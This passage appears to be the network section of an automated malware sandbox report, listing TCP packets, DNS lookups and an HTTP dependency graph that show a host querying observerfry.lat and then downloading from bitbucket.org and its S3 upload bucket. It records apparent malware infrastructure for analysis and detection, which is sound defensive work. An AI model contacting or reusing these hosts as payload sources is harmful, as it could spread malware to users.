Dec 23, 2024 17:21:23.652304888 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:23.652338028 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:23.652375937 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:23.652451038 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:23.652924061 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:23.658426046 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:23.658464909 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:23.658582926 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:23.658582926 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:23.658606052 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:23.664752007 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:23.664848089 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:23.664848089 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:23.664871931 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:23.665014982 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:23.671880960 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:23.671912909 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:23.671962976 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:23.671977997 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:23.671984911 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:23.672056913 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:23.677747965 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:23.677767038 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:23.677860022 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:23.677867889 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:23.677947044 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:23.678620100 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:23.684108019 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:23.684127092 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:23.684242964 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:23.684242964 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:23.684264898 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:23.690443993 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:23.690500021 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:23.690521002 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:23.690535069 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:23.690608978 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:23.734611034 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:23.734630108 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:23.781472921 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:23.841291904 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:23.841311932 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:23.841361046 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:23.841448069 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:23.841448069 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:23.841469049 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:23.841639996 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:23.842050076 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:23.847475052 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:23.847491026 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:23.848311901 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:23.848323107 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:23.853844881 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:23.853867054 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:23.854053020 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:23.854053020 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:23.854065895 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:23.860353947 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:23.860419035 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:23.860425949 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:23.860436916 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:23.860513926 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:23.860970974 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:23.861085892 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:23.867330074 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:23.867357969 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:23.867389917 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:23.867404938 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:23.867419004 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:23.867489100 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:23.867916107 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:23.873253107 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:23.873276949 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:23.873361111 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:23.873361111 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:23.873373985 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:23.879647017 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:23.879693031 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:23.879736900 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:23.879750013 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:23.879810095 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:23.891777039 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:23.891824007 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:23.891895056 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:23.891922951 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:23.891932011 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:23.892002106 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:23.929584980 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.036890030 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.036921978 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.036958933 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.037008047 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.037053108 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.037184954 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.043355942 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.043394089 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.043529987 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.043530941 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.043559074 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.049835920 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.049864054 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.049993992 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.049993992 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.050028086 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.056006908 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.056041002 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.056092978 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.056092978 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.056119919 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.062709093 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.062807083 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.062824965 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.062849998 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.062916994 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.062916994 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.069104910 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.069127083 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.069169044 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.069201946 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.069230080 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.069237947 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.075455904 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.075489044 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.075561047 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.075561047 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.075587988 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.125474930 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.186018944 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.227278948 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.227309942 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.227370024 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.227382898 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.227720976 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.227720976 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.227983952 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.233623981 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.233639956 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.233712912 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.233725071 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.240638018 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.240705967 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.240889072 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.240906000 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.240951061 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.241136074 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.247014999 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.247040987 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.247078896 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.247082949 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.247090101 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.247189045 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.247189045 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.252902985 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.252927065 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.253119946 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.253119946 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.253148079 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.259399891 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.259449005 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.259497881 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.259512901 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.259521008 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.266349077 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.266396046 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.266428947 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.266473055 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.266617060 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.266617060 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.272674084 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.272703886 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.272730112 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.272754908 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.272814035 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.272814035 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.272824049 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.328303099 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.422828913 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.422863960 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.422939062 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.422951937 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.422966957 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.422972918 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.422986984 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.429758072 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.429780960 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.429841042 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.429851055 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.429864883 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.435822010 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.435839891 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.435880899 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.435890913 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.435956955 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.441786051 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.441836119 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.441983938 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.441983938 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.441994905 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.448465109 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.448575020 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.448601007 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.448622942 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.448669910 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.454868078 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.454910994 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.455101967 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.455101967 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.455126047 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.455203056 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.461332083 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.461352110 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.461510897 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.461543083 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.461647034 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.462191105 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.491944075 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.611380100 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.611407995 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.611597061 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.611624002 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.612023115 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.612165928 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.618438959 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.618473053 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.618581057 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.618581057 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.618606091 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.624914885 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.624938965 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.625042915 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.625042915 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.625066042 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.631071091 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.631086111 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.631185055 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.631185055 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.631213903 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.637484074 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.637505054 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.637593985 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.637618065 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.637684107 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.644181967 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.644232035 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.644284010 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.644285917 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.644285917 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.644309044 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.644390106 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.650568008 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.650587082 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.650621891 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.650690079 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.650710106 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.650774002 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.656815052 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.656836033 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.656991959 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.656991959 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.657020092 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.659074068 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.807189941 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.807224035 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.807337046 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.807337046 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.807363033 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.807482004 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.807554007 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.813874006 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.813905954 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.814198017 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.814198017 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.814229965 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.820202112 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.820240021 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.820538044 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.820538044 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.820555925 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.821108103 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:24.822613001 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:24.873709917 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:25.126418114 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:25.381870031 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:25.381931067 CET	443	49783	52.217.75.84	192.168.2.9
Dec 23, 2024 17:21:25.381968021 CET	49783	443	192.168.2.9	52.217.75.84
Dec 23, 2024 17:21:25.381975889 CET	443	49783	52.217.75.84	192.168.2.9

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 23, 2024 17:20:54.893101931 CET	60772	53	192.168.2.9	1.1.1.1
Dec 23, 2024 17:20:55.034312010 CET	53	60772	1.1.1.1	192.168.2.9
Dec 23, 2024 17:21:17.808382034 CET	53869	53	192.168.2.9	1.1.1.1
Dec 23, 2024 17:21:17.947547913 CET	53	53869	1.1.1.1	192.168.2.9
Dec 23, 2024 17:21:20.240093946 CET	59741	53	192.168.2.9	1.1.1.1
Dec 23, 2024 17:21:20.594074965 CET	53	59741	1.1.1.1	192.168.2.9

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 23, 2024 17:20:54.893101931 CET	192.168.2.9	1.1.1.1	0x4faf	Standard query (0)	observerfry.lat	A (IP address)	IN (0x0001)	false
Dec 23, 2024 17:21:17.808382034 CET	192.168.2.9	1.1.1.1	0x5205	Standard query (0)	bitbucket.org	A (IP address)	IN (0x0001)	false
Dec 23, 2024 17:21:20.240093946 CET	192.168.2.9	1.1.1.1	0x7bac	Standard query (0)	bbuseruploads.s3.amazonaws.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 23, 2024 17:20:49.348419905 CET	1.1.1.1	192.168.2.9	0x9e6d	No error (0)	shed.dual-low.s-part-0035.t-0009.t-msedge.net	s-part-0035.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 23, 2024 17:20:49.348419905 CET	1.1.1.1	192.168.2.9	0x9e6d	No error (0)	s-part-0035.t-0009.t-msedge.net		13.107.246.63	A (IP address)	IN (0x0001)	false
Dec 23, 2024 17:20:55.034312010 CET	1.1.1.1	192.168.2.9	0x4faf	No error (0)	observerfry.lat		104.21.36.201	A (IP address)	IN (0x0001)	false
Dec 23, 2024 17:20:55.034312010 CET	1.1.1.1	192.168.2.9	0x4faf	No error (0)	observerfry.lat		172.67.199.72	A (IP address)	IN (0x0001)	false
Dec 23, 2024 17:21:17.947547913 CET	1.1.1.1	192.168.2.9	0x5205	No error (0)	bitbucket.org		185.166.143.49	A (IP address)	IN (0x0001)	false
Dec 23, 2024 17:21:17.947547913 CET	1.1.1.1	192.168.2.9	0x5205	No error (0)	bitbucket.org		185.166.143.48	A (IP address)	IN (0x0001)	false
Dec 23, 2024 17:21:17.947547913 CET	1.1.1.1	192.168.2.9	0x5205	No error (0)	bitbucket.org		185.166.143.50	A (IP address)	IN (0x0001)	false
Dec 23, 2024 17:21:20.594074965 CET	1.1.1.1	192.168.2.9	0x7bac	No error (0)	bbuseruploads.s3.amazonaws.com	s3-1-w.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 23, 2024 17:21:20.594074965 CET	1.1.1.1	192.168.2.9	0x7bac	No error (0)	s3-1-w.amazonaws.com	s3-w.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 23, 2024 17:21:20.594074965 CET	1.1.1.1	192.168.2.9	0x7bac	No error (0)	s3-w.us-east-1.amazonaws.com		52.217.75.84	A (IP address)	IN (0x0001)	false
Dec 23, 2024 17:21:20.594074965 CET	1.1.1.1	192.168.2.9	0x7bac	No error (0)	s3-w.us-east-1.amazonaws.com		54.231.196.113	A (IP address)	IN (0x0001)	false
Dec 23, 2024 17:21:20.594074965 CET	1.1.1.1	192.168.2.9	0x7bac	No error (0)	s3-w.us-east-1.amazonaws.com		52.217.131.161	A (IP address)	IN (0x0001)	false
Dec 23, 2024 17:21:20.594074965 CET	1.1.1.1	192.168.2.9	0x7bac	No error (0)	s3-w.us-east-1.amazonaws.com		52.217.167.225	A (IP address)	IN (0x0001)	false
Dec 23, 2024 17:21:20.594074965 CET	1.1.1.1	192.168.2.9	0x7bac	No error (0)	s3-w.us-east-1.amazonaws.com		52.216.36.241	A (IP address)	IN (0x0001)	false
Dec 23, 2024 17:21:20.594074965 CET	1.1.1.1	192.168.2.9	0x7bac	No error (0)	s3-w.us-east-1.amazonaws.com		3.5.28.79	A (IP address)	IN (0x0001)	false
Dec 23, 2024 17:21:20.594074965 CET	1.1.1.1	192.168.2.9	0x7bac	No error (0)	s3-w.us-east-1.amazonaws.com		3.5.25.243	A (IP address)	IN (0x0001)	false
Dec 23, 2024 17:21:20.594074965 CET	1.1.1.1	192.168.2.9	0x7bac	No error (0)	s3-w.us-east-1.amazonaws.com		3.5.25.114	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

observerfry.lat

bitbucket.org

bbuseruploads.s3.amazonaws.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
